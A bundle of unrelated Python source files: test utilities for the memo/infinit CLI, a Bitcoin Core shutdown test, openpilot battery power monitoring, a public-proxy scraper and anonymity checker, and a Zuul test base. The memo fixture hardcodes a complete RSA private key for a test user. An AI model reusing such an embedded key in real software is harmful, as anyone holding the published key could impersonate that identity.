process = subprocess.Popen(
args,
env = env_,
stdin = subprocess.PIPE if not gdb else None,
stdout = subprocess.PIPE if not gdb else None,
stderr = subprocess.PIPE if not gdb else None,
)
self.process = process
if input is not None:
process.stdin.write(input)
process.pretty = pretty
return process
def run(self,
args,
input = None,
return_code = 0,
env = {},
gdb = False,
valgrind = False,
timeout = 600,
noscript = False,
binary = binary,
kill = False):
'''Return (stdout, stderr).'''
args = [binary] + args
out = None
err = None
try:
process = self.spawn(
args, input, return_code, env,
gdb = gdb, valgrind = valgrind,
noscript = noscript)
out, err = process.communicate(timeout = timeout)
process.wait()
except (subprocess.TimeoutExpired, KeyboardInterrupt):
process.kill()
try:
out, err = process.communicate(timeout = 15)
except ValueError as e:
log("Got exception while trying to kill process:", e)
# Python bug, throws ValueError. But in that case blocking
# `read` is fine.
# out = process.stdout.read()
# err = process.stderr.read()
log(prefix_lines('STDOUT: ', out.decode('utf-8')))
log(prefix_lines('STDERR: ', err.decode('utf-8')))
if kill:
return out, err
raise
if out is not None:
out = out.decode('utf-8')
if err is not None:
err = err.decode('utf-8')
# log('STDOUT: %s' % out)
# log('STDERR: %s' % err)
if process.returncode != return_code:
raise Exception(
'command failed with code %s: %s\nstdout: %s\nstderr: %s' % \
(process.returncode, process.pretty, out, err))
self.last_out = out
self.last_err = err
return out, err
def run_json(self, args, gdb = False, valgrind = False,
*largs, **kwargs):
out, err = self.run(args.split(' ') if isinstance(args, str) else args,
gdb = gdb, valgrind = valgrind,
*largs, **kwargs)
try:
res = [json.loads(l) for l in out.split(cr) if l]
if len(res) == 0:
return None
elif len(res) == 1:
return res[0]
else:
return res
except Exception as e:
raise Exception('invalid JSON: %r' % out)
def throws(f, contains = None):
try:
f()
assert False
except Exception as e:
if contains is not None:
assertIn(contains, str(e))
pass
import bottle
class Beyond():
def __init__(self, beyond_args = {}, disable_authentication = False,
bottle_args = {}):
super().__init__()
self.__beyond_args = beyond_args
self.__advance = timedelta()
self.__server = bottle.WSGIRefServer(port = 0)
self.__app = None
self.__beyond = None
self.__couchdb = infinit.beyond.couchdb.CouchDB()
self.__datastore = None
self.__gcs = FakeGCS()
self.__hub_delegate_user = None
self.__disable_authentication = disable_authentication
self.__bottle_args = bottle_args
def __enter__(self):
couchdb = self.__couchdb.__enter__()
self.__datastore = \
infinit.beyond.couchdb.CouchDBDatastore(couchdb)
def run():
args = {
'dropbox_app_key': 'db_key',
'dropbox_app_secret': 'db_secret',
'google_app_key': 'google_key',
'google_app_secret': 'google_secret',
'gcs_app_key': 'google_key',
'gcs_app_secret': 'google_secret',
}
args.update(self.__beyond_args)
self.__beyond = infinit.beyond.Beyond(
datastore = self.__datastore,
**args
)
setattr(self.__beyond, '_Beyond__now', self.now)
bargs = {
'beyond': self.__beyond,
'gcs': self.__gcs,
}
bargs.update(self.__bottle_args)
self.__app = infinit.beyond.bottle.Bottle(**bargs)
if self.__disable_authentication:
self.__app.authenticate = lambda x: None
self.emailer = Emailer()
bottle.run(app = self.__app,
quiet = True,
server = self.__server)
import threading
from functools import partial
thread = threading.Thread(target = run)
thread.daemon = True
thread.start()
while self.__server.port == 0 and thread.is_alive():
import time
time.sleep(.1)
if not thread.is_alive():
raise Exception("Server is already dead")
# Register hub user.
import requests
self.__hub_delegate_user = {
'email': 'hub@infini.io',
'name': self.__beyond.delegate_user,
'private_key': {
'rsa': 'MIIEowIBAAKCAQEAspp/p8TnTRLao+KeBnz1tvlAC3UKAjXOmfyVJw0Lpe29mxbnAq3uUD8Um5t5jHwYX3P8r+FOL83Yt41Y+dkbWM3hQoYA2Et4ypDRUQ3k+ku6kNHkRhRY9nmAhHM9L8C5VlcYQG197mN/+h9sS1EarYV/BawY4VIcEj7z65Xv6Z0YYvEgjLXjlDmUPEg1wZOA2mcx8RcTyhvok5sl7WWO0J00sZSFqTHCFpZFiBY49cCax2+EuXMdlqlcnKZvWtQVQc5JR4T1vccx+TJUM3JeZpKNAVCI9von2CxXaqCaDwN3D9B6V7cgFW8j+PSSQFjri2341/zkK37IkicJAi/vqQIDAQABAoIBACdc/b2QHBpUiXONQp7Tc6Q8Eu1zgh0ylrJBhO3yZhrP5vYDei6Q/vEYtgYFoihgQU7oVUy+L2lByP3LXUzTmL9dwMPUnOMO3zRl7nwav9iaUCgS2mjHm0PXS4fljhq0MyTgVSv99b9QlqgdvNRsr6CGx5QMdf9TBXTQAxptFU87Ph5O8KrX8wgmFcWqSNEPh6yT9fhl9E0KxkuWh0x2zf8NpsUrBP1CQRhJsxtraTLfKTy8OowVYcx9mHAj4MHg2LVqjRn/QXN4IPdyU5wHMKk95Tf8sLByn0lAfiYM0SMUjy428ueY01WTl0+sN4lSJkHJ7Oz8fajMWeIQhm+wmrECgYEA1/nGE5XndPH82idwXcauGIWTW/jIJAI2VoqHHl7CW0Jw4Q1AeyyJB+3Tu+lUjNwTHDgq0fEjXyup1Hv2diPZecoiw/UWDqMHGawN9JXz/V6ro56eQN3jAuwg15Xig36CtEw8Ay9NdnD7pK/9h8vGsmtqwH3BR0qFR5PX33PE4VMCgYEA07O6/A9BCQpKYB7ovlPu9xxm5Y907HdyqYfSrz2RXP7m0VvXp18cB+KqqCfkipj/ckv2qAA/ng6P/43b+6o5li5g0wM83GwJ0UXIFeoClcTKXlP8x531eVwP58nFsDHUKd3F7hLdmBbAizVV6WQqKFL7g/H+K9mjCTW0vskQn5MCgYAjo/1S+BblDpX6bi212/aY51olAE4O2yqaZ2va0Cpkovc7vFMawIOwgkfBp8SjJiIlMwOl95QtvWfeP8KxRkM6POg1zDkimzatvt3iseg8tKXAb4mQDM3Miqj0yrBBoNvy4u24XNL8q7JrP/unsDIO+Xj5YQdHO335DOW/4zvnLwKBgQCD+Ch59LBgCFAw91OzQfNXjBcAx5rlxdhuokLOBx1U0XnlzND0fy+kIsKrrKKlW5byEzShqfX+e6l8b1xQ196qJiMpp30LEzZThKKkNoqB/nkAsG6FqYxaqO8pWPipS4asypkWPiBxLM2+efMiWNSG6qPrrrD5eORPW3Fe9UwtjQKBgFHLxxn0SX34IBTdQrNFmP4oUK2CW7s86S7XvfzPxgbTj1nAhooJBfjp6OuKPdKlvGKueEwJ+w4ZMPPU8cnXQpSLU2Amifz5LU0vwphAd+Lw2rK878ku1PZSHJPddqbKcpr/swOm0frRWt8jY8RKzADpqmVRZebUleuDmJZ5d25H'
},
'public_key': {
'rsa': 'MIIBCgKCAQEAspp/p8TnTRLao+KeBnz1tvlAC3UKAjXOmfyVJw0Lpe29mxbnAq3uUD8Um5t5jHwYX3P8r+FOL83Yt41Y+dkbWM3hQoYA2Et4ypDRUQ3k+ku6kNHkRhRY9nmAhHM9L8C5VlcYQG197mN/+h9sS1EarYV/BawY4VIcEj7z65Xv6Z0YYvEgjLXjlDmUPEg1wZOA2mcx8RcTyhvok5sl7WWO0J00sZSFqTHCFpZFiBY49cCax2+EuXMdlqlcnKZvWtQVQc5JR4T1vccx+TJUM3JeZpKNAVCI9von2CxXaqCaDwN3D9B6V7cgFW8j+PSSQFjri2341/zkK37IkicJAi/vqQIDAQAB'
}
}
kwargs = {
'headers': {'Content-Type': 'application/json'},
'data': json.dumps(self.hub_delegate_user)
}
res = requests.request(
url = '%s/users/%s' % (self.domain, self.hub_delegate_user['name']),
method = 'PUT',
**kwargs)
res.raise_for_status()
return self
def __exit__(self, *args, **kwargs):
self.__couchdb.__exit__()
@property
def emailer(self):
return self.__beyond.emailer
@emailer.setter
def emailer(self, emailer):
setattr(self.__beyond, '_Beyond__emailer', emailer)
@property
def hub_delegate_user(self):
return self.__hub_delegate_user
@property
def domain(self):
return "http://localhost:%s" % self.__server.port
# XXX: Duplicated from beyond/tests/utils.py, could be merged someday.
def now(self):
import datetime
return datetime.datetime.utcnow() + self.__advance
def advance(self, seconds, set = False):
if set:
self.__advance = timedelta(seconds = seconds)
else:
self.__advance += timedelta(seconds = seconds)
class User():
def __init__(self, name, memo):
self.name = name
self.storage = '%s/%s-storage' % (name, name)
self.network = '%s/%s-network' % (name, name)
self.volume = '%s/%s-volume' % (name, name)
self.mountpoint = '%s/%s-mountpoint' % (memo.dir, name)
self.drive = '%s/%s-drive' % (name, name)
os.mkdir(self.mountpoint)
self.memo = memo
def run(self, cli, **kargs):
return self.memo.run(
cli.split(' ') if isinstance(cli, str) else cli,
env = { 'MEMO_USER': self.name }, **kargs)
def run_json(self, *args, **kwargs):
if 'env' in kwargs:
env['MEMO_USER'] = self.name
else:
kwargs['env'] = { 'MEMO_USER': self.name }
return self.memo.run_json(*args, **kwargs)
def run_split(self, args, **kargs):
return self.memo.run(args, env = { 'MEMO_USER': self.name }, **kargs)
def async(self, cli, **kargs):
import threading
from functools import partial
thread = threading.Thread(
target = partial(self.run, cli = cli, **kargs))
thread.daemon = True
thread.start()
return thread
def fail(self, cli, **kargs):
self.memo.run(cli.split(' '), return_code = 1, **kargs)
class SharedLogicCLITests():
def __init__(self, entity):
self.__entity = entity
def run(self):
entity = self.__entity
# Creating and deleting entity.
with Memo() as bob:
e_name = random_sequence()
bob.run(['user', 'create', 'bob'])
bob.run(['network', 'create', 'network', '--as', 'bob'])
bob.run([entity, 'create', e_name, '-N', 'network',
'--as', 'bob'])
bob.run([entity, 'export', 'bob/%s' % e_name, '--as', 'bob'])
bob.run([entity, 'delete', e_name, '--as', 'bob'])
# Push to the hub.
with Beyond() as beyond, \
Memo(beyond = beyond) as bob, Memo(beyond) as alice:
e_name = random_sequence()
bob.run(['user', 'signup', 'bob', '--email', 'bob@infinit.sh'])
bob.run(['network', 'create', 'network', '--as', 'bob',
'--push'])
bob.run([entity, 'create', e_name, '-N', 'network',
'--description', 'something', '--as', 'bob', '--push'])
try:
bob.run([entity, '--push', '--name', e_name])
unreachable()
except Exception as e:
pass
alice.run(['user', 'signup', 'alice',
'--email', 'a@infinit.sh'])
alice.run([entity, 'fetch', 'bob/%s' % e_name,
'--as', 'alice'])
e = alice.run_json([entity, 'export', 'bob/%s' % e_name,
'--as', 'alice'])
assertEq(e['description'], 'something')
# Pull and delete.
with Beyond() as beyond, Memo(beyond = beyond) as bob:
e_name = random_sequence()
e_name2 = e_name
while e_name2 == e_name:
e_name2 = random_sequence()
bob.run(['user', 'signup', 'bob', '--email', 'b@infinit.sh'])
bob.run(['network', 'create', '--as', 'bob', 'n', '--push'])
# Local and Beyond.
bob.run([entity, 'create', '--as', 'bob', e_name,
'-N', 'n', '--push'])
assertEq(len(bob.run_json([entity, 'list', '-s'])), 1)
bob.run([entity, 'delete', '--as', 'bob', e_name, '--pull'])
assertEq(len(bob.run_json([entity, 'list', '-s'])), 0)
bob.run([entity, 'fetch', '--as', 'bob', e_name],
return_code = 1)
# Local only.
bob.run([entity, 'create', '--as', 'bob', e_name2, '-N', 'n'])
assertEq(len(bob.run_json([entity, 'list', '-s'])), 1)
bob.run([entity, 'delete', '--as', 'bob', e_name2, '--pull'])
assertEq(len(bob.run_json([entity, 'list', '-s'])), 0)
class KeyValueStoreInfrastructure():
def __init__(self, usr, uname = 'bob', kvname = 'kv'):
self.__usr = usr
self.__uname = uname
self.__kvname = kvname
self.__proc = None
self.__stub = None
self.__endpoint = None
@property
def usr(self):
return self.__usr
@property
def uname(self):
return self.__uname
@property
def kvname(self):
return self.__kvname
@property
def stub(self):
return self.__stub
@property
def endpoint(self):
return self.__endpoint
def __enter__(self):
self.usr.run(['user', 'create', self.uname])
self.usr.run(['silo', 'create', 'filesystem', 's'])
self.usr.run(['network', 'create', 'n', '-S', 's',
'--as', self.uname])
self.usr.run(['kvs', 'create', self.kvname,
'-N', 'n', '--as', self.uname])
port_file = '%s/port' % self.usr.dir
self.__proc = self.usr.spawn(
['memo', 'kvs', 'run', self.kvname, '--as', self.uname,
'--allow-root-creation',
'--grpc', '127.0.0.1:0', '--grpc-port-file', port_file])
def comm(self):
self.out, self.err = self.__proc.communicate()
import threading
self.__comm = threading.Thread(target=comm, args=[self])
self.__comm.start()
while not os.path.exists(port_file):
time.sleep(0.1)
with open(port_file, 'r') as f:
self.__endpoint = '127.0.0.1:{}'.format(f.readline().strip())
import grpc
import memo_kvs_pb2_grpc
channel = grpc.insecure_channel(self.__endpoint)
self.__stub = memo_kvs_pb2_grpc.KeyValueStoreStub(channel)
return self
def __exit__(self, *args, **kwargs):
if self.__proc:
self.__proc.terminate()
self.__comm.join()
if not windows:
try:
# SIGTERM is not caught on windows. Might be wine related.
assertEq(0, self.__proc.wait())
except:
log(prefix_lines('STDOUT: ', self.out.decode('utf-8')))
log(prefix_lines('STDERR: ', self.err.decode('utf-8')))
raise
def client(self):
import grpc
import memo_kvs_pb2_grpc
channel = grpc.insecure_channel(self.__endpoint)
return memo_kvs_pb2_grpc.KeyValueStoreStub(channel)
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test axed shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
Thread(target=test_long_call, args=(node,)).start()
# wait 1 second to ensure event loop waits for current connections to close
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 30*3600
MIN_ON_TIME_S = 3600
OPKR_SHUTDOWN_TIME = 3 # sec
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of peripheralState voltage
self.car_voltage_instant_mV = 12e3 # Last value of peripheralState voltage
self.integration_lock = threading.Lock()
self.ts_last_charging_ctrl = None
self.power_on2_time = 0
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, peripheralState, ignition):
try:
now = sec_since_boot()
# If peripheralState is None, we're probably not in a car, so we don't care
if peripheralState is None or peripheralState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = peripheralState.voltage
self.car_voltage_mV = ((peripheralState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if ignition:
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, ignition, in_car, offroad_timestamp):
if offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= not ignition
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= in_car
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, peripheralState, ignition, in_car, offroad_timestamp, started_seen):
if offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client)
BATT_PERC_OFF = 60
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(ignition, in_car, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 5))
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
def charging_ctrl(self, msg, ts, to_discharge, to_charge ):
if self.ts_last_charging_ctrl is None or (ts - self.ts_last_charging_ctrl) >= 300.:
battery_changing = HARDWARE.get_battery_charging()
if self.ts_last_charging_ctrl:
if msg.deviceState.batteryPercent >= to_discharge and battery_changing:
HARDWARE.set_battery_charging(False)
elif msg.deviceState.batteryPercent <= to_charge and not battery_changing:
HARDWARE.set_battery_charging(True)
self.ts_last_charging_ctrl = ts
|
getproxy.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import, division, \
print_function
import os
import json
import time
import copy
# import signal
import logging
import requests
import geoip2.database
from threading import Thread
from queue import Queue, Empty
# from .utils import signal_name
from .utils import load_object
logger = logging.getLogger(__name__)
class GetProxy(object):
base_dir = os.path.dirname(os.path.realpath(__file__))
def __init__(self, input_proxies=[], only_https=False,
max_response_time=None, only_anonimous=False,
n_threads=200):
self.plugins = []
self.web_proxies = []
self.valid_proxies = []
self.input_proxies = input_proxies
self.proxies_hash = {}
self.only_https = only_https
self.max_response_time = max_response_time
self.only_anonimous = only_anonimous
self.origin_ip = None
self.geoip_reader = None
self.n_threads = n_threads
def _collect_result(self):
for plugin in self.plugins:
if not plugin.result:
continue
self.web_proxies.extend(plugin.result)
def _validate_proxy(self, proxy, scheme='https'):
country = proxy.get('country')
host = proxy.get('host')
port = proxy.get('port')
proxy_hash = '%s://%s:%s' % (scheme, host, port)
if proxy_hash in self.proxies_hash:
return
self.proxies_hash[proxy_hash] = True
request_proxies = {
scheme: "%s:%s" % (host, port)
}
request_begin = time.time()
try:
response_json = requests.get(
"%s://httpbin.org/get?show_env=1&cur=%s" % (scheme,
request_begin),
proxies=request_proxies,
timeout=5
).json()
except:
return
request_end = time.time()
response_time = round(request_end - request_begin, 2)
if self.max_response_time:
if response_time > self.max_response_time:
return
if str(request_begin) != response_json.get('args', {}).get('cur', ''):
return
anonymity = self._check_proxy_anonymity(response_json)
if self.only_anonimous and anonymity == 'transparent':
return
try:
country = country or \
self.geoip_reader.country(host).country.iso_code
except Exception:
country = "UNK"
export_address = self._check_export_address(response_json)
return {
"type": scheme,
"host": host,
"export_address": export_address,
"port": port,
"anonymity": anonymity,
"country": country,
"response_time": response_time,
"from": proxy.get('from')
}
def validate_proxy(self, queue, valid_proxies):
while True:
try:
proxy, scheme = queue.get(timeout=10)
logger.debug("validating proxy %s", proxy)
try:
res = self._validate_proxy(proxy, scheme)
except Exception:
res = None
if res:
valid_proxies.append(res)
queue.task_done()
except Empty:
return
def _validate_proxy_list(self, proxies, timeout=300):
valid_proxies = []
queue = Queue()
if self.only_https:
schemes = ["https"]
else:
schemes = ["http", "https"]
for scheme in schemes:
for proxy in proxies:
queue.put((proxy, scheme))
self.threads = [Thread(target=self.validate_proxy,
name="ProxyValidator " + str(x),
args=(queue, valid_proxies))
for x in range(self.n_threads)]
for thread in self.threads:
thread.setDaemon(True)
thread.start()
queue.join()
return valid_proxies
def _check_proxy_anonymity(self, response):
via = response.get('headers', {}).get('Via', '')
if self.origin_ip in json.dumps(response):
return 'transparent'
elif via and via != "1.1 vegur":
return 'anonymous'
else:
return 'high_anonymous'
def _check_export_address(self, response):
origin = response.get('origin', '').split(', ')
if self.origin_ip in origin:
origin.remove(self.origin_ip)
return origin
# def _request_force_stop(self, signum, _):
# logger.warning("[-] Cold shut down")
#
# raise SystemExit()
# def _request_stop(self, signum, _):
# logger.debug("Got signal %s" % signal_name(signum))
#
# signal.signal(signal.SIGINT, self._request_force_stop)
# signal.signal(signal.SIGTERM, self._request_force_stop)
def init(self):
logger.debug("[*] Init")
# signal.signal(signal.SIGINT, self._request_stop)
# signal.signal(signal.SIGTERM, self._request_stop)
rp = requests.get('http://httpbin.org/get')
self.origin_ip = rp.json().get('origin', '')
logger.debug("[*] Current Ip Address: %s" % self.origin_ip)
self.geoip_reader = geoip2.database.Reader(
os.path.join(self.base_dir, 'data/GeoLite2-Country.mmdb'))
def validate_input_proxies(self):
logger.debug("[*] Validate input proxies")
self.valid_proxies = self._validate_proxy_list(self.input_proxies)
logger.debug("[*] Check %s input proxies, Got %s valid input proxies" %
(len(self.proxies_hash), len(self.valid_proxies)))
def load_plugins(self):
logger.debug("[*] Load plugins")
for plugin_name in os.listdir(os.path.join(self.base_dir, 'plugin')):
if os.path.splitext(plugin_name)[1] != '.py' or \
plugin_name in ['__init__.py', 'ip181.py', 'xicidaili.py']:
continue
try:
cls = load_object(
"getproxy.plugin.%s.Proxy" % os.path.splitext(
plugin_name)[0])
except Exception as e:
logger.warning("[-] Load Plugin %s error: %s" % (
plugin_name, str(e)))
continue
inst = cls()
inst.proxies = copy.deepcopy(self.valid_proxies)
self.plugins.append(inst)
def grab_web_proxies(self):
logger.debug("[*] Grab proxies")
threads = [Thread(target=plugin.start, args=())
for plugin in self.plugins]
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join(600)
self._collect_result()
def validate_web_proxies(self):
logger.debug("[*] Validate web proxies")
input_proxies_len = len(self.proxies_hash)
valid_proxies = self._validate_proxy_list(self.web_proxies)
self.valid_proxies.extend(valid_proxies)
output_proxies_len = len(self.proxies_hash) - input_proxies_len
logger.info(
"[*] Check %s new proxies, Got %s valid new proxies" %
(output_proxies_len, len(valid_proxies)))
logger.info("[*] Check %s proxies, Got %s valid proxies" %
(len(self.proxies_hash), len(self.valid_proxies)))
def start(self):
self.init()
self.validate_input_proxies()
self.load_plugins()
self.grab_web_proxies()
self.validate_web_proxies()
return self.valid_proxies
|
base.py
|
#!/usr/bin/env python
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from six.moves import configparser as ConfigParser
import gc
import hashlib
import json
import logging
import os
import pprint
from six.moves import queue as Queue
from six.moves import urllib
import random
import re
import select
import shutil
from six.moves import reload_module
import socket
import string
import subprocess
import swiftclient
import threading
import time
import uuid
import git
import gear
import fixtures
import pymysql
import statsd
import testtools
from git import GitCommandError
import zuul.connection.gerrit
import zuul.connection.smtp
import zuul.connection.sql
import zuul.scheduler
import zuul.webapp
import zuul.rpclistener
import zuul.launcher.gearman
import zuul.lib.swift
import zuul.merger.client
import zuul.merger.merger
import zuul.merger.server
import zuul.reporter.gerrit
import zuul.reporter.smtp
import zuul.source.gerrit
import zuul.trigger.gerrit
import zuul.trigger.timer
import zuul.trigger.zuultrigger
FIXTURE_DIR = os.path.join(os.path.dirname(__file__),
'fixtures')
USE_TEMPDIR = True
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-32s '
'%(levelname)-8s %(message)s')
def repack_repo(path):
cmd = ['git', '--git-dir=%s/.git' % path, 'repack', '-afd']
output = subprocess.Popen(cmd, close_fds=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out = output.communicate()
if output.returncode:
raise Exception("git repack returned %d" % output.returncode)
return out
def random_sha1():
return hashlib.sha1(str(random.random())).hexdigest()
def iterate_timeout(max_seconds, purpose):
start = time.time()
count = 0
while (time.time() < start + max_seconds):
count += 1
yield count
time.sleep(0)
raise Exception("Timeout waiting for %s" % purpose)
class ChangeReference(git.Reference):
_common_path_default = "refs/changes"
_points_to_commits_only = True
class FakeChange(object):
categories = {'Approved': ('Approved', -1, 1),
'Code-Review': ('Code-Review', -2, 2),
'Verified': ('Verified', -2, 2)}
# TODO(tobiash): This is used as a translation layer between the tests
# which use lower case labels. This can be removed if all
# tests are converted to use the correct casing.
categories_translation = {'approved': 'Approved',
'code-review': 'Code-Review',
'verified': 'Verified',
'Approved': 'Approved',
'Code-Review': 'Code-Review',
'Verified': 'Verified',
'CRVW': 'Code-Review',
'APRV': 'Approved',
'VRFY': 'Verified'}
def __init__(self, gerrit, number, project, branch, subject,
status='NEW', upstream_root=None):
self.gerrit = gerrit
self.reported = 0
self.queried = 0
self.patchsets = []
self.number = number
self.project = project
self.branch = branch
self.subject = subject
self.latest_patchset = 0
self.depends_on_change = None
self.needed_by_changes = []
self.fail_merge = False
self.messages = []
self.data = {
'branch': branch,
'comments': [],
'commitMessage': subject,
'createdOn': time.time(),
'id': 'I' + random_sha1(),
'lastUpdated': time.time(),
'number': str(number),
'open': status == 'NEW',
'owner': {'email': 'user@example.com',
'name': 'User Name',
'username': 'username'},
'patchSets': self.patchsets,
'project': project,
'status': status,
'subject': subject,
'submitRecords': [],
'url': 'https://hostname/%s' % number}
self.upstream_root = upstream_root
self.addPatchset()
self.data['submitRecords'] = self.getSubmitRecords()
self.open = status == 'NEW'
def add_fake_change_to_repo(self, msg, fn, large):
path = os.path.join(self.upstream_root, self.project)
repo = git.Repo(path)
ref = ChangeReference.create(repo, '1/%s/%s' % (self.number,
self.latest_patchset),
'refs/tags/init')
repo.head.reference = ref
zuul.merger.merger.reset_repo_to_head(repo)
repo.git.clean('-x', '-f', '-d')
path = os.path.join(self.upstream_root, self.project)
if not large:
fn = os.path.join(path, fn)
f = open(fn, 'w')
f.write("test %s %s %s\n" %
(self.branch, self.number, self.latest_patchset))
f.close()
repo.index.add([fn])
else:
for fni in range(100):
fn = os.path.join(path, str(fni))
f = open(fn, 'w')
for ci in range(4096):
f.write(random.choice(string.printable))
f.close()
repo.index.add([fn])
r = repo.index.commit(msg)
repo.head.reference = 'master'
zuul.merger.merger.reset_repo_to_head(repo)
repo.git.clean('-x', '-f', '-d')
repo.heads['master'].checkout()
return r
